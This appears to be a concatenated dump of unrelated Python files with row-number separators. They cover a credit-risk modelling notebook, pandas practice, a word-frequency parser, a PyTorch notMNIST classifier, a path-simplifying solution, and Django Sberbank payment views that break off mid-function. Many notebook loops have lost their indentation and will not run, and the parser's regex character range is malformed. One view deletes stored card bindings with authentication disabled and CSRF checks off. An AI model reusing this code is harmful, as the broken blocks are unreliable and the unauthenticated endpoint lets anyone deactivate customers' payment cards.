from itertools import product
class MeanEncoder:
    """K-fold mean (target) encoder for high-cardinality categorical features.

    Each category value is replaced by a smoothed estimate of the target mean
    for that value, computed out-of-fold to limit target leakage:

        encoding = beta * prior + (1 - beta) * posterior

    where ``prior`` is the global target mean, ``posterior`` the per-category
    mean, and ``beta`` a weight produced by ``prior_weight_func`` from the
    category's observation count (rare categories shrink towards the prior).
    """

    def __init__(self, categorical_features, n_splits=10, target_type='classification', prior_weight_func=None):
        """
        :param categorical_features: list of str, the name of the categorical columns to encode
        :param n_splits: the number of splits used in mean encoding
        :param target_type: str, 'regression' or 'classification'
        :param prior_weight_func:
            a function that takes in the number of observations, and outputs prior weight
            when a dict is passed, the default exponential decay function will be used:
            k: the number of observations needed for the posterior to be weighted equally as the prior
            f: larger f --> smaller slope
        """
        self.categorical_features = categorical_features
        self.n_splits = n_splits
        self.learned_stats = {}

        if target_type == 'classification':
            self.target_type = target_type
            self.target_values = []
        else:
            # Anything other than 'classification' is treated as regression.
            self.target_type = 'regression'
            self.target_values = None

        if isinstance(prior_weight_func, dict):
            # Build the default decay function with k/f taken from the dict;
            # eval() is used so the dict entries become the lambda's globals.
            self.prior_weight_func = eval('lambda x: 1 / (1 + np.exp((x - k) / f))', dict(prior_weight_func, np=np))
        elif callable(prior_weight_func):
            self.prior_weight_func = prior_weight_func
        else:
            self.prior_weight_func = lambda x: 1 / (1 + np.exp((x - 2) / 1))

    @staticmethod
    def mean_encode_subroutine(X_train, y_train, X_test, variable, target, prior_weight_func):
        """Encode one (variable, target) pair fitted on X_train, applied to X_test.

        :return: (nf_train, nf_test, prior, col_avg_y) where ``col_avg_y`` maps
            each category seen in X_train to its smoothed encoding.
        """
        X_train = X_train[[variable]].copy()
        X_test = X_test[[variable]].copy()

        if target is not None:
            nf_name = '{}_pred_{}'.format(variable, target)
            X_train['pred_temp'] = (y_train == target).astype(int)  # classification: one-vs-rest indicator
        else:
            nf_name = '{}_pred'.format(variable)
            X_train['pred_temp'] = y_train  # regression: raw target
        prior = X_train['pred_temp'].mean()

        # FIX: dict-based renaming agg on a SeriesGroupBy raises
        # SpecificationError on pandas >= 1.0; use named aggregation instead
        # (same result: a frame with 'mean' and 'beta' columns).
        col_avg_y = X_train.groupby(by=variable)['pred_temp'].agg(mean='mean', beta='size')
        col_avg_y['beta'] = prior_weight_func(col_avg_y['beta'])
        col_avg_y[nf_name] = col_avg_y['beta'] * prior + (1 - col_avg_y['beta']) * col_avg_y['mean']
        col_avg_y.drop(['beta', 'mean'], axis=1, inplace=True)

        nf_train = X_train.join(col_avg_y, on=variable)[nf_name].values
        # Categories unseen in X_train fall back to the global prior.
        nf_test = X_test.join(col_avg_y, on=variable).fillna(prior, inplace=False)[nf_name].values

        return nf_train, nf_test, prior, col_avg_y

    def fit_transform(self, X, y):
        """
        :param X: pandas DataFrame, n_samples * n_features
        :param y: pandas Series, n_samples (``y.iloc`` is used, so a Series is
            required rather than a bare numpy array)
        :return X_new: the transformed pandas DataFrame containing mean-encoded categorical features
        """
        X_new = X.copy()
        if self.target_type == 'classification':
            skf = StratifiedKFold(self.n_splits)
        else:
            skf = KFold(self.n_splits)

        if self.target_type == 'classification':
            self.target_values = sorted(set(y))
            self.learned_stats = {'{}_pred_{}'.format(variable, target): [] for variable, target in
                                  product(self.categorical_features, self.target_values)}
            for variable, target in product(self.categorical_features, self.target_values):
                nf_name = '{}_pred_{}'.format(variable, target)
                X_new.loc[:, nf_name] = np.nan
                for large_ind, small_ind in skf.split(y, y):
                    nf_large, nf_small, prior, col_avg_y = MeanEncoder.mean_encode_subroutine(
                        X_new.iloc[large_ind], y.iloc[large_ind], X_new.iloc[small_ind], variable, target, self.prior_weight_func)
                    # nf_name was just appended, so it is the last column.
                    X_new.iloc[small_ind, -1] = nf_small
                    self.learned_stats[nf_name].append((prior, col_avg_y))
        else:
            self.learned_stats = {'{}_pred'.format(variable): [] for variable in self.categorical_features}
            for variable in self.categorical_features:
                nf_name = '{}_pred'.format(variable)
                X_new.loc[:, nf_name] = np.nan
                for large_ind, small_ind in skf.split(y, y):
                    nf_large, nf_small, prior, col_avg_y = MeanEncoder.mean_encode_subroutine(
                        X_new.iloc[large_ind], y.iloc[large_ind], X_new.iloc[small_ind], variable, None, self.prior_weight_func)
                    # nf_name was just appended, so it is the last column.
                    X_new.iloc[small_ind, -1] = nf_small
                    self.learned_stats[nf_name].append((prior, col_avg_y))
        return X_new

    def transform(self, X):
        """
        :param X: pandas DataFrame, n_samples * n_features
        :return X_new: the transformed pandas DataFrame containing mean-encoded categorical features
        """
        X_new = X.copy()

        if self.target_type == 'classification':
            for variable, target in product(self.categorical_features, self.target_values):
                nf_name = '{}_pred_{}'.format(variable, target)
                X_new[nf_name] = 0
                # Average the encodings learned on each of the n_splits folds.
                for prior, col_avg_y in self.learned_stats[nf_name]:
                    X_new[nf_name] += X_new[[variable]].join(col_avg_y, on=variable).fillna(prior, inplace=False)[
                        nf_name]
                X_new[nf_name] /= self.n_splits
        else:
            for variable in self.categorical_features:
                nf_name = '{}_pred'.format(variable)
                X_new[nf_name] = 0
                # Average the encodings learned on each of the n_splits folds.
                for prior, col_avg_y in self.learned_stats[nf_name]:
                    X_new[nf_name] += X_new[[variable]].join(col_avg_y, on=variable).fillna(prior, inplace=False)[
                        nf_name]
                X_new[nf_name] /= self.n_splits

        return X_new
# In[17]:
# 高基类别特征做平均数编码
MeanEnocodeFeature = ['cus_area','date','liandong_t_drcard_trans_tim_first',
'liandong_t_drcard_trans_tim_curr',
'liandong_t_crdt_trans_tim_first',
'liandong_t_crdt_trans_tim_curr'] #声明需要平均数编码的特征
ME = MeanEncoder(MeanEnocodeFeature,target_type='classification') #声明平均数编码的类
X_data = filter_data.drop(['y_label'],axis=1)
Y_data = filter_data['y_label']
X_data = ME.fit_transform(X_data,Y_data) #对训练数据集的X和y进行拟合
#x_train_fav = ME.fit_transform(x_train,y_train_fav)#对训练数据集的X和y进行拟合
# filter_data['cus_area'].nunique() 3481
# X_data.drop(['cus_area'],axis=1,inplace=True)
X_data.shape
# In[18]:
# 中文表头转换
cnn_2_en_dic = {'haoduoshu_该手机号对应自然人在天猫上注册的ID个数':'haoduoshu_phone_tianmao_counts',
'tenxun_疑似信贷恶意行为':'tenxun_yisieyixindai',
'gaode_打分结果':'gaode_score',
'tenxun_疑似资料仿冒行为':'tenxun_fake_info',
'tenxun_疑似金融黑产相关':'tenxun_finance_black',
'haoduoshu_手机可信等级':'haoduoshu_shoujikexindengji'}
X_data.rename(columns=cnn_2_en_dic,inplace=True)
# In[19]:
# 年龄分箱
age_bins = [20,30,40,50,60]
X_data['age'] = pd.cut(X_data['age'],age_bins)
# In[20]:
# 将原始编码特征drop
drop_col = ['date',
'liandong_t_drcard_trans_tim_first',
'liandong_t_drcard_trans_tim_curr',
'liandong_t_crdt_trans_tim_first',
'liandong_t_crdt_trans_tim_curr',
'cus_area']
X_data.drop(drop_col,axis=1,inplace=True)
# In[22]:
# 数据one hot 编码
X_data = pd.get_dummies(X_data,columns=['haoduoshu_shoujikexindengji','age'])
X_data.info()
# In[23]:
# 数据缺失值填充,填充中位数 因为数据有偏移的情况
for col in X_data.columns:
X_data[col].fillna(X_data[col].median(),inplace=True)
# In[28]:
# 年龄one hot后的变量重命名
re_dict = {'age_(20, 30]':'age_20_30',
'age_(30, 40]':'age_30_40',
'age_(40, 50]':'age_40_50',
'age_(50, 60]':'age_50_60'}
X_data.rename(columns=re_dict,inplace=True)
# In[29]:
# 根据特征重要性排序挑选特征,使用null importance feature消除噪声
# 获取树模型的特征重要性
def get_feature_importances(data, shuffle, target, seed=None):
    """Train a quick LightGBM random forest and return its feature importances.

    Part of the null-importance feature-selection procedure: with
    ``shuffle=True`` the target is permuted to obtain "null" importances.

    :param data: pandas DataFrame holding the features and the target column
    :param shuffle: bool, if True the target is shuffled (null-importance run)
    :param target: str, name of the target column in ``data``
    :param seed: optional int, LightGBM seed
    :return: DataFrame with columns feature / importance_gain / importance_split
    """
    # Feature columns: everything except the target
    train_features = [f for f in data if f not in [target]]
    y = data[target].copy()
    # Shuffle the target when building null importances
    if shuffle:
        # .copy().sample(frac=1.0) shuffles without touching the original data
        y = data[target].copy().sample(frac=1.0)
    # Use LightGBM's random-forest mode (reportedly faster than sklearn's RF)
    # NOTE(review): Dataset(silent=True) was removed in recent lightgbm
    # releases -- confirm the installed version still accepts it.
    dtrain = lgb.Dataset(data[train_features], y, free_raw_data=False, silent=True)
    lgb_params = {
        'objective': 'binary',
        'boosting_type': 'rf',
        'subsample': 0.623,
        'colsample_bytree': 0.7,
        'num_leaves': 30,
        'max_depth': 5,
        'seed': seed,
        'bagging_freq': 1,
        'n_jobs': 4
    }
    # Train
    clf = lgb.train(params=lgb_params, train_set=dtrain, num_boost_round=200)
    # Get feature importances
    imp_df = pd.DataFrame()
    imp_df["feature"] = list(train_features)
    imp_df["importance_gain"] = clf.feature_importance(importance_type='gain')
    imp_df["importance_split"] = clf.feature_importance(importance_type='split')
    return imp_df
actual_imp = get_feature_importances(data=pd.concat([X_data,Y_data],axis=1),shuffle=False,target='y_label')
actual_imp.sort_values("importance_gain",ascending=False)
# In[31]:
# 计算null importance
null_imp_df = pd.DataFrame()
nb_runs = 10
import time
start = time.time()
dsp = ''
for i in range(nb_runs):
# 获取当前轮feature impotance
imp_df = get_feature_importances(data=pd.concat([X_data,Y_data],axis=1), shuffle=True, target='y_label')
imp_df['run'] = i + 1
# 加到合集上去
null_imp_df = pd.concat([null_imp_df, imp_df], axis=0)
# 擦除旧信息
for l in range(len(dsp)):
print('b', end='', flush=True)
# 显示当前轮信息
spent = (time.time() - start) / 60
dsp = 'Done with %4d of %4d (Spent %5.1f min)' % (i + 1, nb_runs, spent)
print(dsp, end='', flush=True)
# In[32]:
# 计算原始特征重要性和null importance method的特征重要性的得分
# score = log((1+actual_importance)/(1+null_importance_75))
feature_scores = []
for _f in actual_imp['feature'].unique():
f_null_imps_gain = null_imp_df.loc[null_imp_df['feature'] == _f, 'importance_gain'].values
f_act_imps_gain = actual_imp.loc[actual_imp['feature'] == _f, 'importance_gain'].mean()
gain_score = np.log(1e-10 + f_act_imps_gain / (1 + np.percentile(f_null_imps_gain, 75))) # Avoid didvide by zero
f_null_imps_split = null_imp_df.loc[null_imp_df['feature'] == _f, 'importance_split'].values
f_act_imps_split = actual_imp.loc[actual_imp['feature'] == _f, 'importance_split'].mean()
split_score = np.log(1e-10 + f_act_imps_split / (1 + np.percentile(f_null_imps_split, 75))) # Avoid didvide by zero
final_score = 0.4*split_score+0.6*gain_score
feature_scores.append((_f, split_score, gain_score,final_score))
scores_df = pd.DataFrame(feature_scores, columns=['feature', 'split_score', 'gain_score','final_score'])
null_importance_score = 'null_importance_score.xlsx'
scores_df.to_excel(null_importance_score,index=False)
# In[34]:
# 过滤
filter_var = scores_df[scores_df['final_score']>0.1].feature.tolist()
X_data = X_data[filter_var]
X_data.shape
# In[35]:
# 数据做归一化
from sklearn.preprocessing import MinMaxScaler
min_max_scaler = MinMaxScaler()
min_max_scaler.fit(X_data.values)
X_data = pd.DataFrame(min_max_scaler.transform(X_data.values),columns=X_data.columns)
# In[37]:
# 拆分数据集
from sklearn.model_selection import train_test_split
y = Y_data # target
X = X_data
# 80% 是 是线下数据
# 20% 是 是线上的数据
X_offset, X_onset, y_offset, y_onset = train_test_split(X, y ,test_size=0.2,random_state=2)
X_offset.shape,X_onset.shape
# # LR CV
# In[38]:
from sklearn.linear_model import LogisticRegression,ElasticNet
clf = LogisticRegression(C=1.0, class_weight=None, dual=False, fit_intercept=True,
intercept_scaling=1, l1_ratio=None, max_iter=100,
multi_class='warn', n_jobs=None, penalty='l2',
random_state=None, solver='warn', tol=0.0001, verbose=0,
warm_start=False)
# 线上预测的结果集
onset_predictions = np.zeros(len(X_onset))
# 线下验证的结果集
offset_predictions = np.zeros(len(X_offset))
# 线下cv auc的均值
mean_score = 0
sk = StratifiedKFold(n_splits=5,shuffle=True)
for fold,(train_idx,val_idx) in enumerate(sk.split(X_offset.values,y_offset.values)):
print('fold {}:'.format(fold+1))
trn_data = X_offset.iloc[train_idx]
val_data = X_offset.iloc[val_idx]
clf.fit(trn_data,y_offset.iloc[train_idx])
# 线下每折的结果集
offset_predictions[val_idx] = clf.predict_proba(val_data.values)[:,1]
mean_score += roc_auc_score(y_offset.iloc[val_idx],offset_predictions[val_idx])/sk.n_splits
onset_predictions += clf.predict_proba(X_onset.values)[:,1]/sk.n_splits
print('lr 线下cv的平均auc:{:<8.5f}'.format(mean_score))
print('lr 线下结果集的auc:{:<8.5f}'.format(roc_auc_score(y_offset,offset_predictions)))
# 线上得分
print('lr 线上结果集的auc:{:<8.5f}'.format(roc_auc_score(y_onset,onset_predictions)))
fpr,tpr,thresholds=roc_curve(y_onset,onset_predictions)
print('lr 线上结果集的ks:{:<8.5f}'.format(max(tpr-fpr)))
# # LGB CV
# In[39]:
from sklearn.model_selection import StratifiedKFold
params = {
'boosting_type': 'gbdt',
'objective': 'binary',
'metric': 'auc',
'num_leaves': 30,
'max_depth': -1,
'min_data_in_leaf': 450,
'learning_rate': 0.01,
'feature_fraction': 0.9,
'bagging_fraction': 0.95,
'bagging_freq': 5,
'lambda_l1': 1,
'lambda_l2': 0.001,# 越小l2正则程度越高
'min_gain_to_split': 0.2,
#'device': 'gpu',
'is_unbalance': True
}
folds = StratifiedKFold(n_splits=5, shuffle=True, random_state=99999)
oof = np.zeros(len(X_offset))
predictions = np.zeros(len(X_onset))
mean_score=0
for fold_, (trn_idx, val_idx) in enumerate(folds.split(X_offset.values, y_offset.values)):
print("Fold {}".format(fold_))
trn_data = lgb.Dataset(X_offset.iloc[trn_idx], label=y_offset.iloc[trn_idx])
val_data = lgb.Dataset(X_offset.iloc[val_idx], label=y_offset.iloc[val_idx])
clf = lgb.train(params, trn_data, 100000, valid_sets = [trn_data, val_data], verbose_eval=100, early_stopping_rounds = 200)
oof[val_idx] = clf.predict(X_offset.iloc[val_idx], num_iteration=clf.best_iteration)
mean_score += roc_auc_score(y_offset.iloc[val_idx], oof[val_idx]) / folds.n_splits
predictions += clf.predict(X_onset, num_iteration=clf.best_iteration) / folds.n_splits
# 线下cv
print("CV score: {:<8.5f}".format(roc_auc_score(y_offset, oof)))
print("mean score: {:<8.5f}".format(mean_score))
# 线上得分
print("lgb online score: {:<8.5f}".format(roc_auc_score(y_onset, predictions)))
fpr,tpr,thresholds=roc_curve(y_onset,predictions)
print('lgb 线上结果集 ks:{:<8.5f}'.format(max(tpr-fpr)))
# # XGB CV
# In[40]:
params={
'booster':'gbtree',
'objective ':'binary:logistic',
'gamma':0.1, # 在树的叶子节点下一个分区的最小损失,越大算法模型越保守 。[0:]
'max_depth':6, # 构建树的深度 [1:]
'subsample':0.8, # 采样训练数据,设置为0.5,随机选择一般的数据实例 (0:1]
'colsample_by_tree':0.8, # 构建树时的采样比率 (0:1]
'eta': 0.01, # 如同学习率
'seed':555, # 随机种子
'silent':1,
'eval_metric':'auc',
'n_job':-1,
# 'tree_method':'gpu_hist'
}
# 线上用于预测的矩阵
test_data = xgb.DMatrix(X_onset,label=y_onset)
# 线上预测的结果集
onset_predictions = np.zeros(len(X_onset))
# 线下验证的结果集
offset_predictions = np.zeros(len(X_offset))
# 线下cv auc的均值
mean_score = 0
sk = StratifiedKFold(n_splits=5,shuffle=True)
for fold,(train_idx,val_idx) in enumerate(sk.split(X_offset.values,y_offset.values)):
print('fold {}:'.format(fold))
trn_data = xgb.DMatrix(X_offset.iloc[train_idx],label=y_offset.iloc[train_idx])
val_data = xgb.DMatrix(X_offset.iloc[val_idx],label=y_offset.iloc[val_idx])
clf = xgb.train(params=params,dtrain=trn_data,num_boost_round=10000,evals=[(trn_data,'train'),(val_data,'val')],
early_stopping_rounds=200,verbose_eval=100)
# 线下每折的结果集
offset_predictions[val_idx] = clf.predict(val_data,ntree_limit=clf.best_iteration)
mean_score += roc_auc_score(y_offset.iloc[val_idx],offset_predictions[val_idx])/sk.n_splits
onset_predictions += clf.predict(test_data,ntree_limit=clf.best_iteration)/sk.n_splits
print('xgb 线下cv的平均auc:{:<8.5f}'.format(mean_score))
print('xgb 线下结果集的auc:{:<8.5f}'.format(roc_auc_score(y_offset,offset_predictions)))
# 线上得分
print('xgb 线上结果集的auc:{:<8.5f}'.format(roc_auc_score(y_onset,onset_predictions)))
fpr,tpr,thresholds=roc_curve(y_onset,onset_predictions)
print('xgb 线上结果集的ks:{:<8.5f}'.format(max(tpr-fpr)))
# # CAB CV
# In[41]:
clf = cab.CatBoostClassifier(iterations=100000,
learning_rate=0.01,
depth=5, loss_function='Logloss',early_stopping_rounds = 100,eval_metric='AUC')
# 线下预测结果集
offset_predictions = np.zeros(len(X_offset))
# 线上预测结果集
onset_predictions = np.zeros(len(X_onset))
# 线下cv auc平均得分
mean_score = 0
sk = StratifiedKFold(n_splits=5,shuffle=True)
for fold,(train_idx,val_idx) in enumerate(sk.split(X_offset.values,y_offset.values)):
print('fold {}'.format(fold+1))
train_data = X_offset.iloc[train_idx]
val_data = X_offset.iloc[val_idx]
clf.fit(train_data, y_offset.iloc[train_idx], eval_set=(val_data,y_offset.iloc[val_idx]),verbose= 50)
offset_predictions[val_idx] = clf.predict_proba(val_data)[:,1]
mean_score += roc_auc_score(y_offset.iloc[val_idx],offset_predictions[val_idx])/sk.n_splits
onset_predictions += clf.predict_proba(X_onset)[:,1]/sk.n_splits
print('cab 线下cv的平均auc:{:<8.5f}'.format(mean_score))
print('cab 线下结果集的auc:{:<8.5f}'.format(roc_auc_score(y_offset,offset_predictions)))
# 线上得分
print('cab 线上结果集的auc:{:<8.5f}'.format(roc_auc_score(y_onset,onset_predictions)))
fpr,tpr,thresholds=roc_curve(y_onset,onset_predictions)
print('cab 线上结果集的ks:{:<8.5f}'.format(max(tpr-fpr)))
|
993,519 | 7ed3f807ea0900931c8cefce84b8e2b0644fa737 | #!/usr/bin/env python
# coding: utf-8
# In[20]:
import pandas as pd
# In[21]:
p1=pd.Series({'r':67,'u':90})
# In[22]:
p1
# In[23]:
p1=pd.Series({'r':67,'u':90},index=['u','r'])
# In[24]:
p1
# In[25]:
p1=pd.Series({'r':67,'u':90},index=['a','b'])
# In[26]:
p1
# In[27]:
l1=[9,8,7,6,5,3]
# In[28]:
s2=pd.Series(l1)
# In[29]:
s2
# In[30]:
s2[3]
# In[31]:
s2[:5]
# In[32]:
s2[-3:]
# In[33]:
s2+5
# In[34]:
p3=pd.DataFrame({'name':['n','k','l'],'value':[9,8,7]})
# In[35]:
p3
# In[ ]:
# In[ ]:
# In[36]:
p3.head
# In[37]:
p3.describe()
# In[38]:
p3.tail()
# In[39]:
p3.tail()
# In[40]:
p3.head()
# In[41]:
import pandas as pd1
# In[42]:
l1=[2,3,4]
# In[43]:
pd1.Series(l1)
# In[ ]:
# In[ ]:
# In[ ]:
|
993,520 | 18c886c3f8603f2c19a8384d89f5b71f2c3eea3a | """
Ryan Pepper (2018)
fileparser.py
This file contains a parser function that processes a text file.
"""
import re
def _read(filename, encodings=('ascii', 'utf-8', 'utf-16', 'latin-1')):
    """
    _read(filename)

    Try to read a file with each candidate encoding in turn and return the
    text decoded by the FIRST encoding that succeeds.

    Fixes over the previous version:
    - stops at the first successful decode (previously the loop kept going,
      so latin-1 -- which never fails -- always produced the final result);
    - an empty file returns '' instead of wrongly raising UnicodeError
      (the old ``if not text`` check treated '' like a decode failure);
    - uses ``with`` so the handle is always closed, and avoids touching an
      unbound ``f`` when ``open`` itself fails;
    - the default is an immutable tuple (mutable default argument pitfall).

    Raises UnicodeError when no encoding succeeds; FileNotFoundError (with
    the offending path) when the file does not exist.

    Input:
        filename, str
            File to be read

    Output:
        str:
            Contents of the file
    """
    for encoding in encodings:
        try:
            with open(filename, encoding=encoding) as f:
                return f.read()
        except (UnicodeDecodeError, UnicodeError):
            # This encoding cannot decode the file; try the next one.
            continue
    raise UnicodeError(filename)
def parse(filename, case_sensitive=False, sort=False):
    """
    parse(filename, case_sensitive=False, sort=False)

    Count word frequencies in a text file.

    Reads *filename* and returns a dictionary mapping each word found in it
    to the number of times that word occurs. Newline characters never count
    as part of a word.

    Inputs:
        filename, str:
            Path of the file whose word frequencies are computed.

        case_sensitive, bool:
            When False (the default) the text is lower-cased first, so
            'The' and 'the' count as the same word.

        sort, bool:
            When True the returned dict is ordered by descending frequency.

    Outputs:
        dict:
            Word -> occurrence count.
    """
    text = _read(filename)

    if not case_sensitive:
        text = text.lower()

    # A "word" here means A-Z, a-z, 0-9 plus apostrophes/hyphens and a range
    # of accented unicode characters (picked from
    # https://unicode-table.com/en/#ipa-extensions). Without the unicode
    # range, characters such as 'â' (seen in moby-dick.txt) would be treated
    # as word boundaries by the re module.
    words = re.findall(r'\w*[\'-\u00c00-u02b08]*\w', text)

    # Tally in a single pass; dict.get avoids the separate zero-filling
    # comprehension while producing the same first-occurrence key order.
    frequency_dict = {}
    for word in words:
        frequency_dict[word] = frequency_dict.get(word, 0) + 1

    if sort:
        # Dicts preserve insertion order on Python 3.6+, so re-inserting in
        # frequency order is enough (older versions need OrderedDict).
        frequency_dict = sort_dict(frequency_dict)

    return frequency_dict
def sort_dict(frequency_dict, reverse=True):
    """
    sort_dict(dictionary)

    Return *frequency_dict* reordered by its numeric values.

    Inputs:
        frequency_dict, dict:
            Dictionary with integer values.

        reverse, bool:
            True (the default) orders highest-value-first; False reverses that.

    Outputs:
        dictionary, dict:
            Same key/value pairs, insertion-ordered by value.

    Examples:
        >>> a = {'a': 2, 'b': 1, 'c': 5}
        >>> sort_dict(a, reverse=True)
        {'c': 5, 'a': 2, 'b': 1}
        >>> sort_dict(a, reverse=False)
        {'b': 1, 'a': 2, 'c': 5}

    Notes:
        Relies on dicts preserving insertion order (Python 3.6+); older
        versions would need collections.OrderedDict.
    """
    ranked_items = sorted(frequency_dict.items(),
                          key=lambda item: item[1],
                          reverse=reverse)
    return dict(ranked_items)
def combine_dicts(dicts_list):
    """
    combine_dicts(dicts_list)

    Combines dictionaries by summing the numerical values of any keys
    which are shared between them.

    Inputs:
        dicts_list, list
            A list containing dictionaries with integer values.

    Outputs:
        dict:
            A combined dictionary with summed values.

    Example:
        >>> a = {'a': 2, 'b': 1, 'c': 5}
        >>> b = {'b': 4, 'c': 12, 'e': 4}
        >>> combine_dicts([a, b])
        {'a': 2, 'b': 5, 'c': 17, 'e': 4}
    """
    # Single pass over every (key, value) pair. This replaces the original
    # O(len(keys) * len(dicts)) key-probing double loop and, more
    # importantly, its bare ``except: pass``, which silently swallowed *any*
    # exception (e.g. a TypeError from a non-numeric value), not just the
    # intended missing-key case.
    combined_dict = {}
    for freq_dict in dicts_list:
        for key, value in freq_dict.items():
            combined_dict[key] = combined_dict.get(key, 0) + value
    return combined_dict
|
993,521 | 6cdcca1c94d576494a259389d2f214c9971c295e |
from __future__ import division, print_function, unicode_literals
import os
import numpy as np
import torch
import torch.utils.data
import torchvision.models as models
import torchvision.transforms as transforms
import torch.nn as nn
#get_ipython().magic(u'matplotlib inline')
import matplotlib.pyplot as plt
from torch.autograd import Variable
from PIL import Image
batch_size = 1
num_epochs = 5
learning_rate = 0.01
# Creates a dictionary for class name to index/label conversion
def class_to_index(root):
    """Map each entry name under *root*, taken in sorted (alphabetical)
    order, to an integer label: {'A': 0, 'B': 1, ...}.

    NOTE(review): every directory entry is indexed, not only sub-directories
    -- assumes *root* contains one folder per class; confirm no stray files.
    """
    entries = sorted(os.listdir(root))
    return {name: position for position, name in enumerate(entries)}
# Creates a list of image file path and label pairs
def create_dataset(root, class_to_labels):
    """Build a list of (image_file_path, label) pairs.

    Walks one sub-folder of *root* per class (in sorted label-name order),
    keeping only regular files; directories are skipped.
    """
    dataset = []
    for class_name in sorted(class_to_labels):
        class_dir = os.path.join(root, class_name)
        label = class_to_labels[class_name]
        for entry in os.listdir(class_dir):
            entry_path = os.path.join(class_dir, entry)
            if os.path.isfile(entry_path):
                dataset.append((entry_path, label))
    return dataset
class CDATA(torch.utils.data.Dataset): # Extend PyTorch's Dataset class
    """Image-classification dataset backed by a train/test folder hierarchy.

    Expects ``root_dir/train/<class_name>/*`` and ``root_dir/test/<class_name>/*``;
    labels come from ``class_to_index`` (alphabetical entry order).
    """

    def __init__(self, root_dir, train, transform=None):
        # root_dir: dataset root containing 'train' and 'test' sub-folders
        # train: bool, selects which split this instance serves
        # transform: optional torchvision transform applied per image
        self.root = root_dir
        self.train = train
        self.transform = transform

        if train:
            image_folder = os.path.join(self.root, "train")
        else:
            image_folder = os.path.join(self.root, "test")
        class_to_labels = class_to_index(image_folder)
        # List of (image_path, label) pairs for the selected split
        self.dataset = create_dataset(image_folder, class_to_labels)

    def __len__(self):
        """Number of samples in the selected split."""
        return len(self.dataset)

    def __getitem__(self, idx):
        """Load sample *idx*; returns (image, label) with the image forced to RGB."""
        image_path, label = self.dataset[idx]
        image = Image.open(image_path).convert('RGB')
        if self.transform is not None:
            image = self.transform(image)
        return (image, label)
composed_transform = transforms.Compose([transforms.Scale((224,224)),transforms.ToTensor()])
train_dataset = CDATA(root_dir='/home/george/py_programs/CDATA/notMNIST_small', train=True, transform=composed_transform) # Supply proper root_dir
test_dataset = CDATA(root_dir='/home/george/py_programs/CDATA/notMNIST_small/', train=False, transform=composed_transform) # Supply proper root_dir
# Let's check the size of the datasets, if implemented correctly they should be 16854 and 1870 respectively
print('Size of train dataset: %d' % len(train_dataset))
print('Size of test dataset: %d' % len(test_dataset))
# Create loaders for the dataset
train_loader = torch.utils.data.DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True)
test_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=False)
vgg16 = models.vgg16(pretrained=True)
#resnet18 = models.resnet18(pretrained=True)
# Code to change the last layers so that they only have 10 classes as output
vgg16.classifier = nn.Sequential(
nn.Linear(512 * 7 * 7, 4096),
nn.ReLU(True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(True),
nn.Dropout(),
nn.Linear(4096, 10),
)
criterion = nn.CrossEntropyLoss() # Define cross-entropy loss
###### WAAAAITTTT!!
# What is the difference between CrossEntropyLoss() and CrossEntropyLoss???? I got an error because of this saying CrossEntropyLoss object has
# no attribute backward()
optimizer_vgg16 = torch.optim.Adam(vgg16.parameters(), lr=learning_rate) # Use Adam optimizer, use learning_rate hyper parameter
def train_vgg16(train_loader, optimizer):
    """Train the module-level ``vgg16`` model for one pass over *train_loader*.

    :param train_loader: DataLoader yielding (images, labels) batches
    :param optimizer: optimizer stepping ``vgg16``'s parameters
    """
    for i, (images, labels) in enumerate(train_loader):
        # FIX: use the ``optimizer`` argument instead of silently relying on
        # the module-level ``optimizer_vgg16`` (the parameter was ignored).
        optimizer.zero_grad()
        outputs = vgg16(images)
        error = criterion(outputs, labels)
        error.backward()
        optimizer.step()
        # Removed the per-batch debug ``print(i)``; report every 100 steps.
        if (i + 1) % 100 == 0:
            # FIX: the original print referenced undefined names ``epoch``
            # and ``train_data`` (NameError once reached) and used the
            # removed ``Tensor.data[0]`` accessor -- ``item()`` is current.
            print('Step [%d/%d], Loss: %.4f'
                  % (i + 1, len(train_loader), error.item()))
def train_resnet18():
    """Placeholder: training loop for ResNet-18 (not implemented)."""
    # Same as above except now using the Resnet-18 network
    pass
def test(model):
    """Placeholder: evaluation of *model* on the test set (not implemented)."""
    pass
|
993,522 | e6c4678c2bd0dc82ce6f86f186fa6ed0b3fc6df5 | class Solution(object):
def simplifyPath(self, path):
if not path:
return path
stack = []
temp = list(path.split('/'))
for each in temp:
if each == '.' or not each:
pass
elif each == '..':
if stack:
stack.pop()
else:
stack.append(each)
return '/'+'/'.join(stack)
|
993,523 | 0b0900420481ccbd67e23535c0a5fb195f6bf7d4 | from hashlib import sha256
import hmac
import json
from collections import OrderedDict
from django.conf import settings
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseRedirect
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from rest_framework.response import Response
from rest_framework.views import APIView
from sberbank.models import Payment, LogEntry, Status
from sberbank.service import BankService
from sberbank.serializers import PaymentSerializer
class StatusView(APIView):
    """Read-only endpoint: returns the status name of a payment looked up by uid."""

    @staticmethod
    def get(request, uid=None):
        # uid: Payment lookup key taken from the URL
        try:
            payment = Payment.objects.get(uid=uid)
        except Payment.DoesNotExist:
            # Unknown payment -> plain 404
            return HttpResponse(status=404)
        return Response({"status": Status(payment.status).name})
class BindingsView(APIView):
    """Returns the card bindings the bank has stored for a client."""

    @staticmethod
    def get(request, client_id=None):
        svc = BankService(settings.MERCHANT_KEY)
        return Response(svc.get_bindings(client_id))
class BindingView(APIView):
    """Deactivates a stored card binding. CSRF-exempt and unauthenticated."""

    authentication_classes = []  # endpoint is intentionally unauthenticated

    @staticmethod
    def delete(request, binding_id=None):
        svc = BankService(settings.MERCHANT_KEY)
        svc.deactivate_binding(binding_id)
        return HttpResponse(status=200)

    @method_decorator(csrf_exempt)
    def dispatch(self, *args, **kwargs):
        # CSRF exemption on dispatch covers every HTTP method of this view.
        return super(BindingView, self).dispatch(*args, **kwargs)
class GetHistoryView(APIView):
    """Lists a client's succeeded payments, most recently updated first."""

    @staticmethod
    def get(request, client_id=None, format=None):
        payments = Payment.objects.filter(client_id=client_id, status=Status.SUCCEEDED).order_by('-updated')
        serializer = PaymentSerializer(payments, many=True)
        return Response(serializer.data)
def callback(request):
    """Bank-to-merchant payment callback.

    When the merchant has a hash key configured, verifies the HMAC-SHA256
    checksum over the request parameters, logs the callback, and rejects
    mismatches; then updates the payment status from the bank's 'status'
    flag. Always answers 200 for unknown orders so the bank stops retrying.
    """
    # Parameters are key-sorted: the bank computes the checksum over the
